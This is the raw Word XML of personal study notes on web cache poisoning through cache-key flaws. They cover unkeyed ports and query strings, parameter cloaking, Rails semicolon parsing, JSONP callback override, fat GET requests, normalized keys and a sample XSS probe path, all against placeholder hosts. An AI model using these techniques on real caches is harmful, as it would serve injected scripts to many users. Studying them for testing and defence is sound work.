    <w:p w14:paraId="605E111A" w14:textId="459F79A5" w:rsidR="008A7EF3" w:rsidRPr="00C825E5" w:rsidRDefault="008A7EF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22152881" w14:textId="77777777" w:rsidR="00941713" w:rsidRPr="00C825E5" w:rsidRDefault="00941713" w:rsidP="00C825E5">
      <w:pPr>
        <w:pStyle w:val="Heading2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Cache key flaws</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120A8171" w14:textId="1AAB0976" w:rsidR="008A7EF3" w:rsidRPr="00C825E5" w:rsidRDefault="00941713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Many websites/CDNs perform various transformations on keyed components when they are saved in the cache key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5964B527" w14:textId="77777777" w:rsidR="00941713" w:rsidRPr="00C825E5" w:rsidRDefault="00941713" w:rsidP="00C82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lastRenderedPageBreak/>
        <w:t>Excluding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the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query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string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0786800C" w14:textId="77777777" w:rsidR="00941713" w:rsidRPr="00C825E5" w:rsidRDefault="00941713" w:rsidP="00C82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Filtering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out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specific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query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parameters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4417C744" w14:textId="5BE01E58" w:rsidR="008B2F8D" w:rsidRPr="00C825E5" w:rsidRDefault="00941713" w:rsidP="00C825E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Normalizing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input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in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keyed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 xml:space="preserve">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  <w:t>components</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3EB295B6" w14:textId="01B5B9AE" w:rsidR="00A52DDD" w:rsidRPr="00C825E5" w:rsidRDefault="008B2F8D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Unkeyed port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E38613" w14:textId="5B753961" w:rsidR="008B2F8D" w:rsidRPr="00C825E5" w:rsidRDefault="008B2F8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Some caching systems will parse the header and exclude the port from the cache key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297475BD" w14:textId="3FF8F55A" w:rsidR="00A52DDD" w:rsidRPr="00C825E5" w:rsidRDefault="00F86B94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Consider a web</w:t>
      </w:r>
      <w:r w:rsidR="003B394C" w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s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it</w:t>
      </w:r>
      <w:r w:rsidR="003B394C" w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00A52DDD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redirect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>ing</w:t>
      </w:r>
      <w:r w:rsidR="00A52DDD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users to a region-specific page</w:t>
      </w:r>
      <w:r w:rsidR="008B2F8D" w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, by using</w:t>
      </w:r>
      <w:r w:rsidR="00A52DDD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the </w:t>
      </w:r>
      <w:r w:rsidR="00A52DDD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Host</w:t>
      </w:r>
      <w:r w:rsidR="00A52DDD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header to dynamically generate the </w:t>
      </w:r>
      <w:r w:rsidR="00A52DDD"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Location</w:t>
      </w:r>
      <w:r w:rsidR="00A52DDD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header in the response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE9604D" w14:textId="77777777" w:rsidR="00E55BD7" w:rsidRPr="00C825E5" w:rsidRDefault="00E55BD7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7E8BA0DB" w14:textId="77777777" w:rsidR="00A52DDD" w:rsidRPr="00C825E5" w:rsidRDefault="00A52DD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 / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA6F19C" w14:textId="77777777" w:rsidR="00A52DDD" w:rsidRPr="00C825E5" w:rsidRDefault="00A52DD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vulnerable-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188FD7D9" w14:textId="77777777" w:rsidR="00A52DDD" w:rsidRPr="00C825E5" w:rsidRDefault="00A52DD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1586211" w14:textId="77777777" w:rsidR="00A52DDD" w:rsidRPr="00C825E5" w:rsidRDefault="00A52DD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HTTP/1.1 302 Moved Permanently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B715E6" w14:textId="77777777" w:rsidR="00A52DDD" w:rsidRPr="00C825E5" w:rsidRDefault="00A52DD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Location: https://vulnerable-website.com/en</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B295460" w14:textId="08CFC55E" w:rsidR="00A52DDD" w:rsidRPr="00C825E5" w:rsidRDefault="00A52DD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Cache-Status: miss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B460A58" w14:textId="721286E7" w:rsidR="00A52DDD" w:rsidRPr="00C825E5" w:rsidRDefault="00A52DD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4BCE515D" w14:textId="30204550" w:rsidR="008B2F8D" w:rsidRPr="00C825E5" w:rsidRDefault="008B2F8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Test if port is excluded from the cache key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610FD1A5" w14:textId="77777777" w:rsidR="00E55BD7" w:rsidRPr="00C825E5" w:rsidRDefault="00E55BD7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1824B8B1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 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CE1406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vulnerable-website.com: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1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E30D16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5879D5D7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HTTP/1.1 302 Moved Permanently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550D7292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Location: https://vulnerable-website.com:1337/en</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B21465" w14:textId="7FF1203B" w:rsidR="008B2F8D" w:rsidRPr="00C825E5" w:rsidRDefault="008B2F8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Cache-Status: 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miss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3666086F" w14:textId="0C00708F" w:rsidR="008B2F8D" w:rsidRPr="00C825E5" w:rsidRDefault="008B2F8D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>--------------------------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E0F6C2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 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126752A3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vulnerable-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D9E8BF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62C29D55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HTTP/1.1 302 Moved Permanently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1ABDB0" w14:textId="77777777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Location: https://vulnerable-website.com:1337/en</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9A9171" w14:textId="36EAA100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Cache-Status: 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hit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622F52B7" w14:textId="77777777" w:rsidR="00E55BD7" w:rsidRPr="00C825E5" w:rsidRDefault="00E55BD7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3E9F1D31" w14:textId="64745E20" w:rsidR="008B2F8D" w:rsidRPr="00C825E5" w:rsidRDefault="008B2F8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=&gt; The port is excluded from the cache key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4BEDEE" w14:textId="77777777" w:rsidR="008B2F8D" w:rsidRPr="00C825E5" w:rsidRDefault="008B2F8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E524029" w14:textId="5D6F3D0C" w:rsidR="008B2F8D" w:rsidRPr="00C825E5" w:rsidRDefault="008B2F8D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Unkeyed query string</w:t>
      </w:r>
      <w:r w:rsidR="000F2CD3"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 xml:space="preserve"> (x)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A9FA91" w14:textId="37DEB8C4" w:rsidR="008B2F8D" w:rsidRPr="00C825E5" w:rsidRDefault="008B2F8D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One of the most common cache-key transformations is to </w:t>
      </w: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exclude the entire query string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766312C3" w14:textId="77777777" w:rsidR="00094E81" w:rsidRPr="00C825E5" w:rsidRDefault="00094E8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0FA65696" w14:textId="4FCC86D1" w:rsidR="00FD6650" w:rsidRPr="00C825E5" w:rsidRDefault="00E11152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Observe how changing a parameter value influences the response. </w:t>
      </w:r>
      <w:r w:rsidR="00FD6650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We can also add a </w:t>
      </w:r>
      <w:r w:rsidR="00FD6650"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made-up</w:t>
      </w:r>
      <w:r w:rsidR="00FD6650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query parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631573AB" w14:textId="4C852EE4" w:rsidR="008B2F8D" w:rsidRPr="00C825E5" w:rsidRDefault="00E11152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the query string is unkeyed, most of the time we would receive an unchanged response, regardless of any parameters we add</w:t>
      </w:r>
      <w:r w:rsidR="00E55BD7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</w:p>
    <w:p w14:paraId="3BD32564" w14:textId="5798A74C" w:rsidR="00094E81" w:rsidRPr="00C825E5" w:rsidRDefault="00094E8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1656ECF2" w14:textId="2C64B6B3" w:rsidR="00094E81" w:rsidRPr="00C825E5" w:rsidRDefault="00094E8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Test with </w:t>
      </w:r>
      <w:r w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pragma: x-get-cache-key</w:t>
      </w:r>
      <w:r w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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header to determine whether query string is cached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC1AAA6" w14:textId="77777777" w:rsidR="00E55BD7" w:rsidRPr="00C825E5" w:rsidRDefault="00E55BD7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45F1D0C6" w14:textId="4C53C467" w:rsidR="00094E81" w:rsidRPr="00C825E5" w:rsidRDefault="00094E8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an unkeyed query string is reflected in response =&gt; XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B45728C" w14:textId="77777777" w:rsidR="00094E81" w:rsidRPr="00C825E5" w:rsidRDefault="00094E8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16383E26" w14:textId="05AD17AC" w:rsidR="00FD6650" w:rsidRPr="00C825E5" w:rsidRDefault="00FD6650" w:rsidP="00C825E5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3064"/>
        </w:tabs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Unkeyed query parameters</w:t>
      </w:r>
      <w:r w:rsidR="00CA41CD"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 xml:space="preserve"> (x)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BA9112" w14:textId="5968D683" w:rsidR="00094E81" w:rsidRPr="00C825E5" w:rsidRDefault="00FD6650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Some websites exclude specific query parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FA5108" w14:textId="2F8CB4EB" w:rsidR="00FD6650" w:rsidRPr="00C825E5" w:rsidRDefault="00FD6650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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C825E5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utm_content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is a good candidate to check. We can also </w:t>
      </w:r>
      <w:r w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">add a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>made-up</w:t>
      </w:r>
      <w:r w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> query parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC5E4B2" w14:textId="1BA021A5" w:rsidR="008B2F8D" w:rsidRPr="00C825E5" w:rsidRDefault="008B2F8D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094D3F9E" w14:textId="77777777" w:rsidR="00FD6650" w:rsidRPr="00C825E5" w:rsidRDefault="00FD6650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Cache parameter cloaking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69376911" w14:textId="15B336AA" w:rsidR="00FD6650" w:rsidRPr="00C825E5" w:rsidRDefault="009530A9" w:rsidP="00C825E5">
      <w:pPr>
        <w:jc w:val="both"/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The de facto standard is that a parameter will either be preceded by a question mark (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?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)</w:t>
      </w:r>
      <w:r w:rsidR="00CA41CD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,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if it's the first one in the query string, or an ampersand (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&amp;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). Some poorly written parsing algorithms will treat </w:t>
      </w:r>
      <w:proofErr w:type="gram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any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?</w:t>
      </w:r>
      <w:proofErr w:type="gram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as the start of a new parameter, regardless of whether it's the first one or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C9A7DB" w14:textId="0FDA2FE5" w:rsidR="00FD6650" w:rsidRPr="00C825E5" w:rsidRDefault="009530A9" w:rsidP="00C825E5">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000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 xml:space="preserve">Consider the following </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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request: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  <w:t>GET</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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  <w:t xml:space="preserve"> /?example=123?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 w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>excluded_param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  <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>bad-stuff-here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AF79C0" w14:textId="125E0F97" w:rsidR="009530A9" w:rsidRPr="00C825E5" w:rsidRDefault="009530A9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The cache would identify two parameters and exclude the second one from the cache key. However, the server doesn't accept the </w:t>
      </w:r>
      <w:proofErr w:type="gram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second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?</w:t>
      </w:r>
      <w:proofErr w:type="gram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as a delimiter and instead only sees one parameter,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example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, whose value is the entire rest of the query string, including our payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D88C60F" w14:textId="77777777" w:rsidR="00DF5964" w:rsidRPr="00C825E5" w:rsidRDefault="00DF5964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</w:p>
    <w:p w14:paraId="190FE8AE" w14:textId="77777777" w:rsidR="00DF5964" w:rsidRPr="00C825E5" w:rsidRDefault="00DF5964" w:rsidP="00C825E5">
      <w:pPr>
        <w:pStyle w:val="Heading4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Exploiting parameter parsing quirks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AE25F8" w14:textId="384B1675" w:rsidR="00DF5964" w:rsidRPr="00C825E5" w:rsidRDefault="00DF5964" w:rsidP="00C825E5">
      <w:pPr>
        <w:spacing w:before="120" w:after="120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Consider the following request:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:rFonts w:asciiTheme="minorHAnsi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 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GET /?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keyed_param</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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=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abc&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C825E5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excluded_param</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C825E5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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>123;keyed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_param=bad-stuff-here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C80C1E5" w14:textId="3979E787" w:rsidR="00DF5964" w:rsidRPr="00C825E5" w:rsidRDefault="00DF5964" w:rsidP="00C825E5">
      <w:pPr>
        <w:spacing w:before="120" w:after="120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Many caches will interpret this as two parameters, delimited by the ampersand:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729B5956" w14:textId="77777777" w:rsidR="00DF5964" w:rsidRPr="00C825E5" w:rsidRDefault="00DF5964" w:rsidP="00C825E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr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keyed_param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=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abc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4CBF2EDA" w14:textId="77777777" w:rsidR="00DF5964" w:rsidRPr="00C825E5" w:rsidRDefault="00DF5964" w:rsidP="00C825E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr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excluded_param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=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123;keyed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_param=bad-stuff-here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D754FB7" w14:textId="77777777" w:rsidR="00DF5964" w:rsidRPr="00C825E5" w:rsidRDefault="00DF5964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lastRenderedPageBreak/>
        <w:t>Once the parsing algorithm removes the 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excluded_param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, the cache key will only contain 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keyed_param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=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abc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 xml:space="preserve">. On the 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back-end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de-DE"/>
        </w:rPr>
        <w:t>, however, Ruby on Rails sees the semicolon and splits the query string into three separate parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787FF63F" w14:textId="77777777" w:rsidR="00DF5964" w:rsidRPr="00C825E5" w:rsidRDefault="00DF5964" w:rsidP="00C825E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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keyed_param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=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abc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6016B5C3" w14:textId="77777777" w:rsidR="00DF5964" w:rsidRPr="00C825E5" w:rsidRDefault="00DF5964" w:rsidP="00C825E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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excluded_param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=123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6247E2D0" w14:textId="77777777" w:rsidR="00DF5964" w:rsidRPr="00C825E5" w:rsidRDefault="00DF5964" w:rsidP="00C825E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/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keyed_param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=bad-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stuff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-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here</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6BE679D5" w14:textId="67F2AFEF" w:rsidR="009530A9" w:rsidRPr="00C825E5" w:rsidRDefault="00DF5964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If the application gives precedence to the latter occurrence of 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keyed_param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val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>,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it will process our malicious payload.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  <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AF9332" w14:textId="3DAA7CA6" w:rsidR="009530A9" w:rsidRPr="00C825E5" w:rsidRDefault="00DF5964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a website is using JSONP to make a cross-domain request, this will often contain a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callback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parameter</w:t>
      </w:r>
      <w:r w:rsidR="007F07AF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(</w:t>
      </w:r>
      <w:r w:rsidR="007F07AF"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search for it in Target</w:t>
      </w:r>
      <w:r w:rsidR="007F07AF"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)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to execute a given function on the returned data:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:rFonts w:asciiTheme="minorHAnsi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 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GET /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jsonp?callback</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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innocentFunction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0A1F0F58" w14:textId="2C425D4F" w:rsidR="009530A9" w:rsidRPr="00C825E5" w:rsidRDefault="00DF5964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We could use these techniques to override the expected callback function and execute arbitrary JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD58EC9" w14:textId="2AD39095" w:rsidR="009530A9" w:rsidRPr="00C825E5" w:rsidRDefault="009530A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</w:p>
    <w:p w14:paraId="53178B61" w14:textId="77777777" w:rsidR="004F5791" w:rsidRPr="00C825E5" w:rsidRDefault="004F5791" w:rsidP="00C825E5">
      <w:pPr>
        <w:pStyle w:val="Heading4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Exploiting fat GET support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115E7C9F" w14:textId="0CEC1AF0" w:rsidR="009530A9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In select cases, the HTTP method may not be keyed. This might allow us to poison the cache with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C825E5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POST</w:t>
      </w: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 request containing a malicious payload in the body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</w:p>
    <w:p w14:paraId="06133E7B" w14:textId="77777777" w:rsidR="00E810FF" w:rsidRPr="00C825E5" w:rsidRDefault="00E810FF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4F1A1A8F" w14:textId="3450427B" w:rsidR="009530A9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We can achieve a similar effect by simply </w:t>
      </w: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adding a body to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C825E5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GET</w:t>
      </w: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 request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to create a "fat"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GET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request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4899E555" w14:textId="77777777" w:rsidR="004F5791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/?param=innocent HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FFC086" w14:textId="77777777" w:rsidR="004F5791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…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DBA965" w14:textId="3889BBEF" w:rsidR="009530A9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param=bad-stuff-here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1215A2E4" w14:textId="6316B980" w:rsidR="009530A9" w:rsidRPr="00C825E5" w:rsidRDefault="009530A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</w:p>
    <w:p w14:paraId="79D757EF" w14:textId="2E4D7AA5" w:rsidR="009530A9" w:rsidRPr="00C825E5" w:rsidRDefault="004F5791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The cache key would be based on the request line, but the server-side value of the parameter could be taken from the body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506C759C" w14:textId="0C8D188D" w:rsidR="009530A9" w:rsidRPr="00C825E5" w:rsidRDefault="009530A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</w:p>
    <w:p w14:paraId="77CEBD75" w14:textId="05DCF0B2" w:rsidR="00471707" w:rsidRPr="00C825E5" w:rsidRDefault="004F5791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the website does not accept </w:t>
      </w:r>
      <w:r w:rsidRPr="00C825E5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GET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requests that have a body, there are potential workarounds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080A9144" w14:textId="77777777" w:rsidR="00FC28CA" w:rsidRPr="00C825E5" w:rsidRDefault="00FC28CA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bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C5931D" w14:textId="77777777" w:rsidR="00471707" w:rsidRPr="00C825E5" w:rsidRDefault="00471707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 /?param=innocent HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A984FF" w14:textId="77777777" w:rsidR="00471707" w:rsidRPr="00C825E5" w:rsidRDefault="00471707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innocent-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5FECBA" w14:textId="77777777" w:rsidR="00471707" w:rsidRPr="00C825E5" w:rsidRDefault="00471707" w:rsidP="00C825E5">
      <w:pPr>
        <w:jc w:val="both"/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X-HTTP-Method-Override: POST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340956FD" w14:textId="77777777" w:rsidR="00471707" w:rsidRPr="00C825E5" w:rsidRDefault="00471707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…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC5A274" w14:textId="655B0352" w:rsidR="00471707" w:rsidRPr="00C825E5" w:rsidRDefault="00471707" w:rsidP="00C825E5">
      <w:pPr>
        <w:jc w:val="both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param=bad-stuff-here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE6BF06" w14:textId="77777777" w:rsidR="007D7220" w:rsidRPr="00C825E5" w:rsidRDefault="007D7220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70FF9690" w14:textId="77777777" w:rsidR="00613C69" w:rsidRPr="00C825E5" w:rsidRDefault="00613C69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Normalized cache keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A60158" w14:textId="35AD7B48" w:rsidR="00E810FF" w:rsidRPr="00C825E5" w:rsidRDefault="00613C6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Some caching implementations normalize keyed input when adding it to the cache key. Both of the following requests would have the same key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D65299E" w14:textId="77777777" w:rsidR="00613C69" w:rsidRPr="00C825E5" w:rsidRDefault="00613C69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example?param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="&gt;&lt;test&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A375F03" w14:textId="4CFA4127" w:rsidR="00E810FF" w:rsidRPr="00C825E5" w:rsidRDefault="00613C6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example?param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=%22%3e%3ctest%3e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1D9850" w14:textId="37A25C32" w:rsidR="00E810FF" w:rsidRPr="00C825E5" w:rsidRDefault="00E810FF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6AB7BAA3" w14:textId="55E0CD88" w:rsidR="00613C69" w:rsidRPr="00C825E5" w:rsidRDefault="00613C69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If we send a malicious request using Burp Repeater, we can poison the cache with an </w:t>
      </w:r>
      <w:r w:rsidRPr="00C825E5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unencoded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XSS payload. When the victim visits the malicious URL, the payload will be URL-encoded by their browser, but it still has the same cache key as the malicious cached response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424DAF04" w14:textId="35B20AA2" w:rsidR="00DA5C48" w:rsidRPr="00C825E5" w:rsidRDefault="00DA5C4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0A4EAB04" w14:textId="5213AC34" w:rsidR="00E44D77" w:rsidRPr="00C825E5" w:rsidRDefault="00E44D77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Also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check for XSS in 404 Not Found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: try </w:t>
      </w:r>
      <w:r w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>non-existent path</w:t>
      </w:r>
      <w:r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like /&lt;script&gt;alert</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAF2208" w14:textId="634A037E" w:rsidR="00DA5C48" w:rsidRPr="00C825E5" w:rsidRDefault="00DA5C48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2974EBCA" w14:textId="413951E0" w:rsidR="00C825E5" w:rsidRDefault="00C825E5" w:rsidP="00C825E5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:jc w:val="both"/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  <w:r w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Firefox periodically checks for browser updates by issuing a request</w:t>
      </w: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to download.mozilla.org:</w:t>
      </w:r>
    </w:p>
